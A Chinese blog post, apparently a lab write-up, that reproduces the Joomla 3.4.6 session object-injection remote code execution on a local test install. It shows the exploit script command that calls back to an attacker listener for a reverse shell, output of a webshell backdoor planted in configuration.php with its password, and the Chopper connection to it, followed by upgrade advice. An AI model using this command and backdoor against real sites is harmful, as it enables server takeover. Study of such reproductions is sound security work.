Joomla-3.4.6远程代码执行复现

最新推荐文章于 2024-08-03 19:27:22 发布
最新推荐文章于 2024-08-03 19:27:22 发布
阅读量95 收藏
点赞数
文章标签: 数据库 php java mysql linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811905
版权

v2-a61b3759dc48b31963e86ec13b90f46c_b.jpg


​影响范围

Joomla3.0.0 至 3.4.6

强烈建议用户前往官方下载更新至最新版本

官方地址downloads.joomla.org

附:cxsecurity.com/issue/WL

漏洞原理

Joomla会话以 PHPObjects 的形式存储在数据库中,并且由 PHP 会话函数处理。但是未认证用户的会话也可以进行存储,因此攻击者通过精心构造的请求包,通过 PHP 对象注入,可以导致未认证的远程代码执行。

1、安装部署

下载:downloads.joomla.org/it

浏览器访问http://127.0.0.1/Joomla/3.4.6/安装

配置


v2-409187340a52332c46b6b19e0f98b7a9_b.jpg


数据库


v2-cd932fb3f4548ec450dd6712e3af7d99_b.jpg


安装


v2-8072f23a7c886b35a7561fd904dfb281_b.jpg


安装成功

github.com/SecurityCN/V


v2-ea77c5ab842971b39eb49c86d339add9_b.jpg


python3Joomla-3.4.6-RCE.py -t 10.211.55.3/joomla/ -e -l192.168.0.105-p4444


v2-0816fdb686f65f4613009cc56e4ce42d_b.jpg


执行成功反弹shell并在“configuration.php”写入随机密码的一句话木马

localhost:Joomla3.4.6-RCE fuwei$ python3 Joomla-3.4.6-RCE.py -t 10.211.55.3/joomla/ -e -l 192.168.0.105 -p 4444[*] Getting Session Cookie ..[*] Getting CSRF Token ..[*] Sending request ..[+] Vulnerable[*] Getting Session Cookie ..[*] Getting CSRF Token ..[*] Sending request ..[+] Backdoor implanted, eval your code at 10.211.55.3/joomla//con in a POST with fvyvnyltqherkhcqlderuyodbduxehuptliptfmxlbvfyejmcf[*] Now it's time to reverse, trying with a system + perl

可以用NC 监听和菜刀连接由于我的PHP是Windows环境所以无法反弹只能通过菜刀连接

caidao密码为 fvyvnyltqherkhcqlderuyodbduxehuptliptfmxlbvfyejmcf


v2-55ad6c364949447124d61ccb42ceceff_b.jpg


菜刀连接成功


v2-b28c7cda7ab5a6559a77998ead608f53_b.jpg


​修复方案:

强烈建议用户前往官方下载更新至最新版本

官方地址downloads.joomla.org

附:cxsecurity.com/issue/WL

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:


v2-be16fc9802cb2dd23f77ec16f33951f8_b.jpg


thelostworld:


v2-20e48f777f98d9c420a04d5037b12820_b.jpg


个人知乎:zhihu.com/people/fu-wei


个人简书:jianshu.com/u/bf0e38a8d

thelostworld-公众号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Joomla-3.4.6远程代码执行漏洞复现
yi_jin_ke_tang的博客
02-15 1003
#01 Joomla简介 Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。 #02 漏洞简介 在exploit-db( https:...
joomla-cms:Joomla的家! 内容管理系统
02-04
Joomla! CMS:trade_mark: 建立状态 无人机CI AppVeyor 这是什么? 这是Joomla! 3.x安装/升级包。 Joomla的。 Joomla! 3.9。 详细的更改在。 什么是Joomla? 是一个内容管理系统(CMS),使您可以构建网站和...
Joomla 3.4.6 远程代码执行漏洞复现(超详细超简单o嘻嘻)
2301_76467680的博客
06-29 378
下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问。然后根据提示删除安装目录即可。然后点击下一步点击安装。至此,环境搭建完毕。
Joomla-3.4.6远程代码执行漏洞利用与分析
Adminxe的博客
07-16 1386
0x01 Joomla简介 Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。 0x02 漏洞简介 在exploit-db(https://www.exploit-db.com/exploits/47465)发布了Joomla命令执行...
joomla对象注入漏洞分析
weixin_34138377的博客
08-09 438
0x00 漏洞简单介绍 jooomla 1.5 到 3.4.5 的全部版本号中存在反序列化对象造成对象注入的漏洞,漏洞利用无须登录,直接在前台就可以运行随意PHP代码Joomla 安全团队紧急公布了 Joomla 3.4.6 版本号,修复了这个高危 0day 漏洞。   0x01 漏洞原理 漏洞存在于反序列化session的过程中。我们能够控制session的值。并且没有过滤...
【漏洞复现Joomla远程代码执行(RCE)
cj_Hydra's Blog
11-12 862
前言: Joomla是一套内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统,最新版本为3.9.11,可以在Linux、Windows、MacOSX等各种不同的平台上执行,在CMS评测中获得“最佳开源CMS”奖! 漏洞位于根目录下的configuration.php ,漏洞相关poc已在互联网公开,采用Joomla并存在漏洞的服务器已处于危险之中。 影响版本: Joomla 3.0.0-3.4.6 复现过程: 第一步:下载源码进行环境搭建 https://downloads.joomla.o
Joomla-PHP
06-20
<p>Joomla!是一套在国外相当知名的内容管理系统CMS,它属于Portal(企业入口网站)类型,顾名思义,就是比较适合作为商业类型的网站程序。</p><p> </p><p>Joomla特点:</p><p>先进的网站技术的运用</p><p>Joomla!...
bitnami-joomla-3.4.1-0-module-windows-installer
11-15
BitNami是一个开源项目,该项目产生的开源软件包括安装 Web应用程序和解决方案堆栈,以及虚拟设备。bitnami主办Bitrock公司成立于2003年在西班牙塞维利亚,由丹尼尔·洛佩兹Ridruejo。bitnami栈用于安装在Linux,...
Joomla joomla-bee模板
12-06
使用Joomla-bee,你可以快速地更改网站的整体外观,无需深入到代码层面进行复杂的定制。模板通常包含HTML、CSS、JavaScript和图像文件,有时还包含PHP代码以实现更高级的功能。 以下是一些关于Joomla-bee模板的关键...
Joomla-Questions-and-Answers:问题和答案
05-23
该组件是使用Joomla。 由 贡献者 这个项目的存在感谢所有为做出贡献的人们。 支持者 谢谢我们所有的支持者! :folded_hands: [] 赞助商 通过成为赞助者来支持该项目。 您的徽标将显示在此处,并带有指向您网站的...
Joomla3.0.0-3.4.6远程代码执行RCE
小石头的博客
07-02 639
一、环境准备 Joomla3.4.6下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6 环境搭建:使用phpstudy即可 提前创建数据库 安装完删除installation文件夹即可成功 二、漏洞复现 1、使用脚本验证漏洞是否存在 使用脚本前先安装脚本所需的模块 pip3 install bs4 pip3 install colorama pip3 install termcolor 运行python3
Joomla 3.4.6 Remote Code Execution漏洞复现
ranuy阮的博客
10-09 3024
0x00.Joomla介绍 Joomla!是一套全球知名的内容管理系统。 Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matter这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地,小组成员约有150人,包含了开发者、设计者、系...
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现
kkkkk0826的专栏
10-13 658
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL 数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被...
joomla 1.5-3.4 Remote Code Execution (exp)
乐枕的家
12-17 1562
poc#!/usr/bin/python # coding=utf-8 import urllib2 import cookielib import sys """ python joomla.py http://example.com/ """cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookiePro
Joomla 3.0.0 -3.4.6远程代码执行漏洞复现
m0_37777713的博客
01-21 594
目录漏洞概述漏洞影响版本复现环境复现过程修复建议 漏洞概述 2019年10月2日,意大利安全公司 Hacktive Security的研究员 AlessandroGroppo 公开了影响 Joomla 内容管理系统老旧版本 3.0.0 至 3.4.6 (在2012年9月末至2015年12月中旬发布)的0day 详情。漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构...
Joomla 3.4.6 远程代码执行漏洞复现
0nc3的博客
10-11 899
0x00 CMS简介 Joomla!是一套全球知名的内容管理系统。 Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matter这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地,小组成员约有150人,包含了开发者、设计者、系统管理者、...
Python爬虫与MongoDB的完美结合
最新发布
weixin_52392194的博客
08-03 411
我们掌握了在Windows和Linux系统下安装MongoDB,设计适合爬虫存储数据的写入规范,并通过实际爬虫示例展示了如何将爬取到的数据存储到MongoDB中。此外,还进行了MongoDB性能优化,提高了数据存储和查询的效率。
SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档
m0_74283290的博客
08-03 638
本论文阐述了一套先进的图书管理系统的设计与实现,该系统采用Java语言,结合现代Web开发框架和技术,旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心,整合MyBatis ORM工具,以及MySQL数据库,构建了一个高性能、可扩展的后端服务。前端界面则采用了Vue.js框架,以提供流畅的用户交互体验。论文首先进行了详尽的需求分析,确定了系统的核心功能,包括图书的添加、编辑、删除、查询,读者的注册、登录、个人信息管理,以及图书的借阅、归还、续借流程。
简单的 mongoDB 学习
qq_19342829的博客
07-31 503
mongodb入门学习整理
"基于Joomla-Platform内容管理框架的学生论文管理系统设计
本文介绍了一种基于Joomla-Platform内容管理框架的学生论文管理系统的设计方案。作者通过利用软件xammp搭建了PHP Apache Mysql环境,并在此基础上安装了Joomla Platform后台。然后使用Joomla Platform作为框架,设计...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值